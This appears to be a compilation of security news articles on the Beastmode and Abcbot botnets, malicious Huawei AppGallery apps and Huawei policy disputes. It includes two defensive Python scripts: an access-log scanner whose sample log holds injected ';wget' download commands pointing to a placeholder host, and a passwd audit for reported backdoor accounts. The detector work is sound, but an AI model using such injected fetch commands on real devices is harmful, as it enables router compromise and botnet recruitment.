Due to New Router Flaws, Beastmode Botnet Has a Greater DDoS Potential

 

Beastmode (or B3astmode), a Mirai-based distributed denial-of-service (DDoS) botnet, has extended its list of exploits with three new ones, all of which target various models of Totolink devices.

Totolink is a well-known electronics sub-brand of Zioncom which recently published firmware patches to address three critical-severity flaws. DDoS botnet programmers wasted little time in adding these holes to their arsenal to take advantage of the window of opportunity before Totolink router customers installed the security patches. Beastmode has gained control of vulnerable routers, giving it access to hardware resources it can use to execute DDoS attacks.

The following is a list of vulnerabilities in TOTOLINK routers: 

  • CVE-2022-26210 (CVSS 9.8) - A command injection vulnerability that could be used to execute arbitrary code.
  • CVE-2022-26186 (CVSS 9.8) - A command injection vulnerability affecting TOTOLINK N600R and A7100RU routers.
  • CVE-2022-25075 to CVE-2022-25084 (CVSS 9.8) - A buffer overflow vulnerability in certain TOTOLINK routers, resulting in code execution.

CVE-2021-4045 is used to target the TP-Link Tapo C200 IP camera, which the researchers haven't seen in any other Mirai-based campaign. For the time being, the exploit has been implemented incorrectly and does not operate. "Device users must still update its camera software to correct this issue," the researchers suggest, citing indications of continued development. 

Although the flaws affect different devices, they all have the same effect: they allow the attacker to insert commands to download shell scripts via the wget command and infect the device with Beastmode. The shell scripts differ depending on which devices have been infected and which exploit has been used.

These vulnerabilities were not the only ones added to the Beastmode botnet; its creators also added the following older bugs:

  • CVE-2021-45382 - Remote code execution bug affecting D-Link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L.
  • CVE-2021-4045 — Unauthenticated remote code execution bug in the TP-Link Tapo C200 IP camera.
  • CVE-2017-17215 — Unauthenticated remote code execution problem in Huawei HG532.
  • CVE-2016-5674 — Remote execution of arbitrary PHP code through the log argument in the Netgear ReadyNAS product line.
Deploy the available security updates that correct the vulnerabilities mentioned above to prevent Mirai variants from seizing control of routers or IoT devices. Totolink users should go to the vendor's download center, choose the device model, and download and install the most recent firmware version available.

A slow internet connection is one symptom of an exploited router. Additional indicators, which a typical user is likely to overlook, include the device heating up more than usual, inability to get into the administration panel, changed settings, or an unresponsive device.
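The common effect described above, an injected command that fetches a shell script with wget, leaves a recognisable trace in web access logs. The Python below is an added example, not code from the researchers or any vendor; it decodes each query parameter (including double percent-encoding) and reports values where a shell separator is followed by a download tool. The endpoint, parameter names and log lines are constructed, and all addresses are from documentation ranges.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# A shell separator or substitution opener, then (optionally via a path or
# busybox) a download tool followed by whitespace and its arguments.
INJECTED_FETCH = re.compile(
    r"(?:[;|&`\n]|\$\()\s*(?:\S*/)?(?:busybox\s+)?(wget|curl|tftp)\s+([^;|&`\n)]*)",
    re.IGNORECASE,
)
# Client address and request target from a Common Log Format line.
CLF_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "\S+ (\S+) [^"]*"')


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_target(request_target):
    """Return (param, tool, args) for each injected download command found."""
    hits = []
    query = urlsplit(request_target).query
    # parse_qsl splits on '&' first and decodes once; values are then
    # decoded further before matching.
    for name, value in parse_qsl(query, keep_blank_values=True):
        for match in INJECTED_FETCH.finditer(fully_decode(value)):
            hits.append((name, match.group(1).lower(), match.group(2).strip()))
    return hits


def scan_log(lines):
    """Scan access-log lines; lines that do not parse are skipped."""
    findings = []
    for line in lines:
        parsed = CLF_LINE.match(line)
        if not parsed:
            continue
        for name, tool, args in scan_target(parsed.group(2)):
            findings.append(
                {"client": parsed.group(1), "param": name, "tool": tool, "args": args}
            )
    return findings


# Constructed sample log: hypothetical endpoint and parameters.
SAMPLE_LOG = [
    '198.51.100.23 - - [01/Apr/2022:10:00:01 +0000] "GET /cgi-bin/example.cgi'
    '?host=192.0.2.1%3Bwget%20http://203.0.113.9/stage.sh HTTP/1.1" 200 12',
    '198.51.100.77 - - [01/Apr/2022:10:00:05 +0000] "GET /cgi-bin/example.cgi'
    '?name=x%2560wget%2520203.0.113.9/b.sh%2560 HTTP/1.1" 200 12',
    '192.0.2.50 - - [01/Apr/2022:10:01:00 +0000] "GET /help'
    '?topic=how+to+use+wget+and+curl HTTP/1.1" 200 512',
    '192.0.2.51 - - [01/Apr/2022:10:01:09 +0000] "GET /search'
    '?q=tea%3B+coffee HTTP/1.1" 200 640',
    "not an access-log line",
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Only the request line is inspected, so payloads carried in POST bodies need the same check applied wherever those bodies are logged.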

Abcbot Malware Linked to the Developers of the Xanthe Cryptomining Bug

 

Abcbot, a newly discovered botnet, has a longer history than was originally believed. Ongoing examination of this malware family shows a clear link to the Xanthe-based cryptojacking campaign found by Cisco's Talos security research team in late 2020. When Talos was notified of an intrusion on one of its Docker honeypots, it discovered malware that looked like a bitcoin mining bot.

The virus is known as Xanthe, and its main goal is to mine cryptocurrency using the resources of a compromised system. Based on the findings, the same threat actor is behind both Xanthe and Abcbot, and its goal has shifted from mining cryptocurrency on compromised hosts to more classic botnet activity like DDoS attacks.

Abcbot attacks, first reported by Qihoo 360's Netlab security team in November 2021, are triggered by a malicious shell script that targets insecure cloud instances operated by cloud service providers such as Huawei, Tencent, Baidu, and Alibaba Cloud. The script downloads malware that co-opts the machine into a botnet, but not before terminating processes from competing threat actors and establishing persistence. The shell script in question is an updated version of one found by Trend Micro in October 2021, which targeted Huawei Cloud's vulnerable ECS instances.

Further investigation of the botnet, which included mapping all known Indicators of Compromise (IoCs) such as IP addresses, URLs, and samples, revealed Abcbot's code and feature-level similarities to that of a cryptocurrency mining operation known as Xanthe, which spread the infection using incorrectly configured Docker implementations. 

The semantic similarities between the two malware families range from the way the source code is formatted to the names given to the routines, with some functions not only having identical names and implementations (e.g., "nameservercheck"), but also having the word "go" appended to the end of their names (e.g., "filerungo"). According to experts, Abcbot also contains spyware that allows four malicious users to be added to the hacked machine:
  • Logger 
  • Ssysall 
  • Ssystem 
  • sautoupdater 
Researchers believe that there are substantial links between the Xanthe and Abcbot malware families, implying that the same threat actor is involved. The majority of these would be difficult and inefficient to recreate identically, including string reuse, mentions of shared infrastructure, stylistic choices, and functionality that can be seen in both instances. If the same threat actor is behind both campaigns, it signals a shift away from cryptocurrency mining on compromised devices and toward botnet-related operations like DDoS attacks.
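The four account names listed above give defenders a concrete check. The Python below is an added example, not code from the researchers; it parses passwd-format text, flags those names (spelled as in this article, compared case-insensitively) and separately flags any non-root account with UID 0. The sample passwd content is constructed.

```python
# Account names as listed in this article, lowercased for comparison.
REPORTED_ACCOUNTS = {"logger", "ssysall", "ssystem", "sautoupdater"}
NON_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}


def parse_passwd(text):
    """Yield one dict per well-formed passwd(5) entry; skip everything else."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            continue
        yield {"name": fields[0], "uid": int(fields[2]),
               "home": fields[5], "shell": fields[6]}


def audit_accounts(passwd_text):
    """Return {account: [reasons]} for entries that deserve a closer look."""
    findings = {}
    for entry in parse_passwd(passwd_text):
        reasons = []
        if entry["name"].lower() in REPORTED_ACCOUNTS:
            reasons.append("name reported for Abcbot")
            if entry["shell"] not in NON_LOGIN_SHELLS:
                reasons.append("interactive shell " + entry["shell"])
        if entry["uid"] == 0 and entry["name"] != "root":
            reasons.append("UID 0 on a non-root account")
        if reasons:
            findings[entry["name"]] = reasons
    return findings


# Constructed sample input, not taken from a real host.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
logger:x:1001:1001::/home/logger:/bin/bash
sautoupdater:x:0:0::/root:/bin/sh
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
broken-line-without-enough-fields
"""

if __name__ == "__main__":
    import sys
    # Pass a passwd file path as the first argument, or run on the sample.
    path = sys.argv[1] if len(sys.argv) > 1 else None
    text = open(path).read() if path else SAMPLE_PASSWD
    for name, reasons in audit_accounts(text).items():
        print(f"{name}: {'; '.join(reasons)}")
```

A name match alone is a lead rather than proof of compromise, so treat each finding as a prompt to review when and how the account was created.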

Huawei's App Gallery Hosted Malicious Apps Installed by 9M+ Android Users

 

Around 9.3 million Android devices have been infected with a new type of malware that masquerades as dozens of arcade, shooter, and strategy games on Huawei's AppGallery marketplace in order to gather device information and victims' phone numbers. 

Researchers from Doctor Web discovered the mobile campaign and categorized the trojan as "Android.Cynos.7.origin," simply because it is a modified variant of the Cynos malware. Some of the 190 rogue games discovered were made for Russian-speaking players, while others were made for Chinese or worldwide audiences. 

Once installed, the applications asked victims for permission to make and manage phone calls, which they then used to access and capture phone numbers as well as other device data, including geolocation, mobile network characteristics, and system metadata.

All of these harmful games are primarily aimed at children, who are easy targets for having all of the requested permissions granted. Huawei has now removed all of the malicious games from its AppGallery app store. For users who have a Huawei smartphone and aren't sure whether they are infected, some of the malicious apps are listed below:
  • “[Команда должна убить боеголовку]” with more than 8000 installs. 
  • “Cat game room” with more than 427000 installs. 
  • “Drive school simulator” with more than 142000 installs. 
  • “[快点躲起来]” with more than 2000000 installs 
Furthermore, the Doctor Web malware analysts have previously warned Huawei about these harmful apps. Doctor Web researchers stated, "At first glance, a mobile phone number leak may seem like an insignificant problem. Yet in reality, it can seriously harm users, especially given the fact that children are the games' main target audience." 

"Even if the mobile phone number is registered to an adult, downloading a child's game may highly likely indicate that the child is the one who actually uses the mobile phone. It is very doubtful that parents would want the above data about the phone to be transferred not only to unknown foreign servers, but to anyone else in general."

500,000 Huawei Devices hit by the Joker Malware

 

Security researchers have discovered that over 500,000 Huawei smartphone users have downloaded apps contaminated by the Joker malware, which inadvertently subscribes them to premium mobile services. For the past couple of years the Joker malware family has infected apps on Google's Play Store, but this is the first time it has appeared on Huawei phones. Huawei users rely on the company's in-house platform, App Gallery, because business restrictions in the USA prevent them from accessing the Google Play Store. Researchers discovered in the App Gallery some 10 apparently harmful applications containing malicious code for connecting to a command and control server and installing additional components.

A source noted that “Doctor Web’s virus analysts have uncovered the first malware on App Gallery―the official app store from the Huawei Android device manufacturer. They turned out to be dangerous Android.Joker trojans that function primarily to subscribe users to premium mobile services. In total, our specialists discovered that 10 modifications of these trojans have found their way onto App Gallery, with more than 538,000 users having installed them.”

The researchers mentioned that the malware subscribes the user to up to five services, but that this limit could be changed at any time by the threat actor. The list of malicious applications included digital keyboards, a camera app, a launcher, an online messenger, an adhesive set, coloring programs, and a game. Most of the applications came from a single developer (Shanxi Kuailaipai Network Technology Co., Ltd.), and two came from separate developers. More than 538,000 Huawei users have installed these 10 applications, according to Doctor Web's reports.

Doctor Web notified Huawei of these applications, and the company detected and removed them from the App Gallery. New users can no longer download them, but users who already have the applications on their devices must remove them manually. Upon being enabled, the malware transmits a configuration file to the remote server, including a task list, premium service websites, and JavaScript which imitates user interaction, the researchers state.

The Joker malware dates back to 2017 and has consistently made its way into games distributed through the Google Play store. In October 2019, Kaspersky malware researcher Tatyana Shishkova tweeted about over 70 compromised applications that had made it into the official store. Reports of the malware in Google Play continued to surge. In early 2020, Google announced the removal of some 1,700 Joker-infected applications. Joker was still in the store last February, and even in July of last year it was still slipping through Google's defenses.

BT Tower Delays Huawei's Removal from EE Company's Network by 2 Years


BT Tower, a communications tower in London, is further delaying the removal of Huawei from the core network of EE. EE is a British ISP and mobile network company that deals in 4G/5G phones, broadband, and SIMs. According to reports, Huawei is expected to remain part of the EE network. The news comes as a surprise because in 2018 BT said that it would remove Huawei equipment from its network hub within two years.


But now, after two years, BT says that 100% of core mobile traffic will be on its new Ericsson-built equipment by 2023, even though the government deadline was January 2020. Besides this, BT condemns the government for also controlling 65% of the network's perimeter to get relieved of Huawei's equipment.

About 5G core and its importance- 
The core of a smartphone's network is like the brain or the heart of the device. Inside the 5G core, voice and other data are routed over different sub-networks and network servers to make sure the data reaches its destination. The process goes like this:

  • Authentication of users to make sure only the subscribed users get the benefits 
  • Calling the correct radio tower to connect with another person's smartphone network. Controlling call-forwarding and voicemail facilities.
  • Sending SMS and multimedia from one smartphone to others. 
  • Communicating the data to 3rd party websites and apps. 
  • Tracking the data used in order to calculate customer usage.

To meet the targets within the timescale set by the government while keeping its focus on 5G networks, it is essential to prioritize the transfer of both 5G and 4G customers to the new Ericsson core network, says a spokesperson. Meanwhile, the US is continuously pressuring officials for an urgent prohibition of Huawei. Earlier this month, some Conservative MPs even went against their party to urge an outright ban on Huawei. "Recent events have shown how necessary it is to disentangle China from UK security infrastructure. Any delay will meet with great resistance," says former MP Liam Fox, International Trade and Defence Secretary.

America Vs China! The USA Alleges Huawei to be a Technology Thief and Spy for China?


In view of recent reports, China and the US have taken their technology war to court. Now, the US firms allege that the telecom colossus, Huawei has been planning to rip them off of their technology for “decades”.

Hence, the American organizations decided to expand the premises of their lawsuit against the Chinese mega-company.

The prosecuting attorney mentioned that Huawei did indeed violate the terms of the contract with the companies of the US by stealing robot technology, trade secrets and such.

Per sources, Huawei has flatly denied all the allegations and has said that the US is merely threatened by the competition and is therefore trying to run down Huawei's name.

Per newspaper reports, the mega smartphone maker’s chief financial officer and the founder’s daughter are held captive in Canada, struggling against extradition.

According to sources, there are charges of fraud and “sanctions violations” on the founder’s daughter, which she has waved off and denied.

Huawei pretty strong-headedly is maintaining that this lawsuit and the charges on the company are trivial attempts at tarnishing the reputation of their company and attempts at depleting stakes of competition.

Per reports, the fresh accusations of the US against Huawei include trade secret embezzlement, racketeering and even sending spies to obtain confidential information.

Sources reveal that the prosecuting attorney also said that Huawei used its stolen data to cut both time and cost in research and development, which helped the company climb faster than the others.

Per Huawei, the newer charges are just another way of bringing up older claims. Nevertheless, it doesn't look like the US plans to withdraw its claims or the lawsuit in the near future, or at all.

This technological rift has a strong possibility of transforming into a political dispute between America and China. The US is forcing countries like the UK to pull back their support from Huawei, continuing to say that the equipment could be used by China for spying.

Relations between China and the US are down a very flimsy and unpredictable road. All the same, the UK still continues its business ties with Huawei but with possible limits.

India Invites Huawei and ZTE to Participate in 5G Trials


Demand for bringing fifth-generation (5G) mobile network technology to India is on the rise, and the government is looking to begin 5G trials. The Department of Telecommunications (DoT) has invited all applicants to show use-cases of 5G networks in India, including Chinese telecom companies Huawei Technologies Co. Ltd and ZTE. On Monday, telecom minister Ravi Shankar Prasad was specifically asked about Huawei, and he said that at this stage, all stakeholders are invited.

“5G trials will be done with all vendors and operators,” telecom minister Ravi Shankar Prasad told media. “We have taken an in-principle decision to give 5G spectrum for trials.”

Amid the ongoing economic and diplomatic tensions between the US and China, the invitation to the 5G trials is the first official stance taken by India on the matter. It also offers Huawei some breathing space after the global scrutiny it has been subjected to over network security concerns. The claims made by the US concern the possibility that China could exploit the equipment to spy on other nations; in its defense, Huawei has constantly denied the allegations.

The US has also alerted the Indian government to the potential risks of allowing these Chinese companies to deploy next-generation technology in India. Morgan Ortagus, the US state department's spokesperson, acknowledged the important role 5G networks will play in the coming era, and also described how high the stakes are when companies under the command of authoritarian regimes deploy technology in other nations. “All countries should adopt national security policies in order to prevent untrusted companies from misusing any part of their future 5G network plans,” Ortagus further added.

As India is yet to finalize the framework and devise a clear plan for 5G technology, Prasad said in the Rajya Sabha that, “The government is creating an enabling framework for the deployment of affordable and secure 5G services in India.”

Referencing from the statements given by Vimal Wakhlu, a former chairman of Telecommunications Consultants India Ltd., “Whether it is Huawei or Ericsson or any other company, India needs to build a system, which can detect any malware and not depend on the brand of a company or a country."

“Any country is capable of snooping on us. The reason some people have been advocating a ban on Huawei is that if it is barred, the market for equipment becomes slightly less competitive and hence it can be sold at higher prices."

Huawei to Reward Hackers for Discovering Any ‘Secret Backdoors’ In Its Smartphone Technology


Hoping to outdo Google, Huawei announced a "big bounty launch" to reward hackers for demonstrating a "critical" weakness in one of its Android devices.

The company revealed the program at a private event for a few of the world's top Android hackers in Munich, Germany, a week ago, and even gave an example of how hackers could bag the first prize: they would need to get remote access to the device without the target 'having to click anything'.

A high-severity hack would be one in which the hacker could assume control over a phone when they had direct access to it.

The company is said to have been following Apple's lead in keeping the 'bug bounty invite-only'. As revealed on Twitter by Forbes 30 Under 30 alum Maria Markstedter, who was one of the invited guests, the researchers who were welcomed would likewise be offered tokens to invite other altruistic hackers too.

The bug bounty was first reported by TechCrunch recently, yet no details on payments or logistics have been disclosed.

Huawei additionally announced that for a "high"-severity issue, hackers can earn up to $110,000 (€100,000), while Google, meanwhile, offers up to $200,000 and $100,000 for demonstrations of comparable attacks on its Pixel phones.

While bug bounties are very common among major smartphone makers, Apple and Google are behind two of the most well-known.

One significant reason suspected for Huawei's move is that it could provide solid evidence that the company isn't concealing any 'secret backdoors' in its most popular phones that the Chinese government could use.

Google restricts Huawei’s access to Android apps





Google has restricted Chinese tech giant Huawei's access to its Android operating system and apps after US President Donald Trump's administration blacklisted the firm.

The order impacted not only Google but US chip-makers as well. Intel Corp, Qualcomm Inc., Xilinx Inc., and Broadcom Inc. have all stopped doing business with the Chinese tech giant.

"We are complying with the order and reviewing the implications," a Google spokesperson said on Monday. Huawei, the world's No. 2 smartphone seller, relies on a suite of Google services for its devices, including the Android system and the Google Play app store.

Huawei will now only be able to use the public version of Android, and its new phones will not have the Google Play store, Gmail, and other services provided by Google.

Users who currently have Huawei smartphones will not be affected by this order, but they won't be able to update their phones.

However, the Chinese tech company claims that it has been working on its own operating system for the last three years.

"Huawei has been building an alternative operating system just in case it is needed," said Huawei spokesperson Glenn Schloss. "We would like to be able to continue operating in the Microsoft and Google ecosystems," he added.

The company has bought Microsoft’s operating system license for its laptops and tablets. Meanwhile, Microsoft (MSFT) did not immediately respond to a request for comment.


US Pressures Its Allies against the Usage of Chinese Firm Huawei’s Technology; Suspects the Products to Spy on Other Countries




The US is pressuring its allies not to use Chinese firm Huawei's technology to build their new 5G networks, as its authorities are worried that China could be using Huawei products to spy on other nations.

"It's a hugely complex strategic challenge," said GCHQ chief Jeremy Fleming, while emphasizing the need for better cyber-security practices in the telecoms industry. The National Cyber Security Centre, which is part of GCHQ, had nevertheless said a few weeks earlier that any risk presented by the company could be managed.

Most of the UK's mobile companies, for instance Vodafone, EE and Three, are known to have been working with Huawei on 5G, but they are currently awaiting the results of a government review, due in March or April, that will decide whether or not they will be permitted to proceed.

An on-going report from the Royal United Services Institute said it would be "naive" and "irresponsible" to permit Huawei the access.

“We have to understand the opportunities and threats from China's technological offer - understand the global nature of supply chains and service provision, irrespective of the flag of the supplier. Take a clear view on the implications of China's technological acquisition strategy in the West, and help our governments decide which parts of this expansion can be embraced, which need risk management, and which will always need a sovereign, or allied, solution," said Fleming in his speech at an event in Singapore.

Focusing on the need for stronger cyber-security across the telecoms sector, Fleming stated: "Vulnerabilities can and will be exploited. But networks should be designed in a way that cauterises the damage."

5G is critical to the UK government's aim of ensuring that Britain stays competitive as a country, according to Gartner senior research director Sylvain Fabre. "They are reviewing the situation, in a way that hasn't been done in the past, but it sounds like all options are still on the table," he told the BBC.

Meanwhile, the US is pursuing criminal charges against Huawei and its CFO, Meng Wanzhou. Speaking at a round table at Mobile World Congress in Barcelona on the 24th of February, Huawei's rotating chairman, Guo Ping, said:

"Huawei needs to abide by Chinese laws and also by the laws outside China if we operate in those countries. Huawei will never, and dare not, and cannot violate any rules and regulations in the countries where we operate."

A Botnet Compromises 18,000 Huawei Routers




A hacker going by the pseudonym Anarchy claims to have built a botnet within 24 hours by exploiting an old vulnerability, reportedly compromising 18,000 routers made by Chinese telecom giant Huawei.

According to a report in Bleeping Computer, the new botnet was first spotted this week by security researchers from a cyber-security company called NewSky Security.

Following the news, other security firms including Rapid7 and Qihoo 360 Netlab confirmed the existence of the new threat, as they had seen a large recent uptick in scanning for Huawei devices.

The botnet creator contacted NewSky security analyst and researcher Ankit Anubhav, who believes that Anarchy may actually be a known threat actor previously identified as Wicked.

The surge in activity was caused by scans looking for devices vulnerable to CVE-2017-17215, a critical security flaw that can be exploited through port 37215. The scans for routers vulnerable to the issue began on 18 July.

While the motives have still not been made clear, the hacker told Anubhav that they wished to make "the biggest and the baddest botnet in town..."
"It's painfully hilarious how attackers can construct big bot armies with known vulns," the security researcher later added.

Working exploit code for compromising Huawei routers through this known flaw was made public in January this year. The code was used in the Satori and Brickerbot botnets, as well as in a series of variants based on the infamous Mirai botnet, which is still going strong.